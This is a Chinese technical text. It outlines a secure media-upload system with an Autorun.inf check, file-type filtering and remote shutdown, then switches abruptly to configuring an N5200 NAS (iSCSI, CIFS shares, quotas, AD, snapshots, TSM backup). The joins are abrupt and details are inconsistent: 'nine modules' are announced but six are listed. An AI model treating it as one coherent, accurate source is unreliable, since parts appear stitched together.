首先保证移动存储设备的安全接入:装载专用的上传目录;检测移动存储设备的根目录,是否有Autorun.inf文件的存在,有则提醒用户删之,或是执行用户指定的操作。
其次保证视频、音频文件的安全上传:列出需要上传的文件;禁止非视频、音频文件类型的上传;测试对被选中上传的视频、音频文件的判断是否属实:安全上传到共享盘。
最后支持安全的远程关机与系统数据的升级和修改:设置管理员登入口:调用WlN-DOWS XP中的shutdown系统指令用以实现远程关机;启动对系统数据的升级和修改模块。
系统主要功能划为九大模块如表1所示:
系统主模块包括:读盘模块、上传模块、删除模块、文件列表模块、远程关机模块、数据修改及升级模块。其中Admin入口的功能是检测管理密码,密码输入正确则显示两个功能模块的按钮。在数据修改模块,管理员可以增加要禁止上传的文件类型和允许上传的文件类型。远程控制关机模块则调用Win-dows的外部命令来实现远程关机。这样做的目的是提高系统的稳定性跟兼容性,减少意外的发生。
Web管理:
a) 在PC终端通过IE浏览器输入:http://192.168.0.21/na_admin,进入FilerView界面;
b) Manage License通过FilerView查看License。
创建数据卷:
a) 通过FilerView Volumes→ADD进行创建卷vol0,Language:选择English(US),Total Volume Size:300GB(根据自己情况设置),其他选项默认完成;
b) FilerView Volumes→Manage管理,设置卷vol0为online状态。
创建QTree:
a) N5200G→Volumes→Qtrees→Add创建Qtree;
b) 输入Qtree名称及Qtree格式(unix),点击Add,提示Qtree创建成功;
c) N5200G→Volumes→Qtrees→Manage管理Qtree。
ISCSI配置:
a) 创建LUN,LUNs→Add;
b) 主机安装CLIENT,安装好后打开,添加盘阵IP:192.168.0.11,将IP激活;
c) 创建Initiator Group,LUNs→initiator→Add,选择端口类型以及操作系统,大框内为主机的NODE NAME;
d) LUNs MAP,LUNs→Manage点击红圈所示位置添加initiator Group,选择相应的group,点Add添加完成;
e) 至此,针对Windows主机的ICSCI输出已经完成,最后要在主机上识别盘阵。右键点击我的电脑→管理→存储→磁盘管理,操作→重新扫描磁盘,可以看到新的磁盘,格式化添加后就可以用了。
CIFS配置:
a) N5200G→Shares→Manage管理Qtree;
b) N5200G→Shares→Add添加磁盘映射share;
c) 通过命令行添加用户密码;
d) 密码要求英文与数字结合,修改密码:N5200G→passwd。输入需要修改的账号即可修改;
e) N5200G→Shares→Manage→change access设定登录用户使用权限;
f) 点击Add Access Control Entry增加权限用户;
g) 设定完毕就可以从主机上映射盘阵的磁盘了。主机识别逻辑磁盘:右键点击我的电脑→映射网络驱动器;
h) 输入:192.168.0.21share。
最后以相应权限的用户名登录即可。
3 系统应用与实现
3.1 磁盘限额
(1) 配置
a) N5200G→Volumes→Quotas→Add创建Quotas;
b) 选择形式及卷Quota Type:tree,点击Next;
c) 选择限制路径Disk Space Hard Limit;
d) 设置限制;
e) N5200G→Quotas→Manage,将需要应用设置的vol启动;
f) N5200G→Quotas→Edit Rules,Quota Type:tree,Quota Volume:vol1,选择要进行磁盘限额的Qtree:Disk Space Hard Limit,可以更改限制设置。
(2) 应用实例:基于文件夹的限额
N5200可以实现基于文件夹的限额,但只限于Qtree级的文件夹,不能实现多级文件夹的限额。
3.2 与Windows AD集成
(1) 配置
a) N5200G→Wizards→CIFS Setup Wizard,进入设置向导,单击Next;
b) Filer Name: NAS01(自定义)单击Next;
c) Authentication:Domain,选择Windows 2000;
d) Domain Name:Test(根据自己域名情况填写),键入Windows 2000 Administrator Name:administrator,Windows 2000 Administrator Password:验证;
e) Security Style:选择NTFS Only;
f) 确认设置信息,提交完成。
(2) 应用实例:与Windows AD集成失效
a) 重复上述设置过程,但第4步,要设置成其他的(可以自定义不存在的)Domain Name;
b) 再次重复上述设置过程,与Windows AD集成恢复正常。
3.3 即时数据保护
(1) 配置
a) Volumes→Snapshots→Add,按Volumes添加Snapshots;
b) Volumes→Snapshots→Configure,Snapshot Reserve:20%,如果磁盘空间不足,可以把此值调小,但快照保存的版本数就会减少。它会在定义的时间段内的某些时间点生成多个快照,这个快照就相当于一个时间点的备份。
(2) 应用实例:用户自行查找丢失文件
a) 用户在需要恢复文件的上一级目录单击右键选属性,可以看到以前的版本的选项卡,下面的窗口列出了相应时间点的快照。选择正确的时间点,打开就可以看到用户自己的文件和文件夹;
b) 注:操作系统为Windows XP SP1或Windows 2000,需安装Volume Shadow Copy client来实现。操作系统为Windows XP SP2及以上可以直接实现。
3.4 集中备份管理
(1) 虚拟磁带库配置
a) 在备份和虚拟磁带库管理共用服务器设置IP地址192.168.0.32,安装虚拟磁带库管理软件VE for Tape Console;
b) 双击打开软件,在“VE for Tape Server2”右键,添加“192.168.0.31”虚拟引擎;
c) 展开“Virtual tape library system-virtral tape library”,右键可以新建虚拟磁带库;
d) 为虚拟磁带库起名ibm-03584L32-001,并选择磁带库模式为03584L32;
e) 选择驱动器类型;
f) 设置磁带编码范围;
g) 完成虚拟磁带库配置。
(2) IBM TSM软件
a) 安装IBM TSM软件,以NDMP备份方式连接NAS N5200
首先定义磁带库:
Define library naslib libtype=SCSI
定义NAS devclass,指定devtype为NAS类型:
Define devclass nasclass devtype=nas library=naslib mountretention=0 estcapacity=300g
定义NAS存储池,TSM对NDMP备份使用不同的数据格式定义存储池:
【信息安全管理体系文件】推荐阅读:
管理信息系统安全07-09
信息安全管理协议07-09
企业信息安全体系建设07-10
医院信息管理安全制度09-24
信息安全管理责任制度07-07
信息安全服务管理制度07-13
医院信息系统安全管理07-23
信息安全管理制度汇总08-07
信息安全管理技术解析08-27
学校信息安全管理办法09-06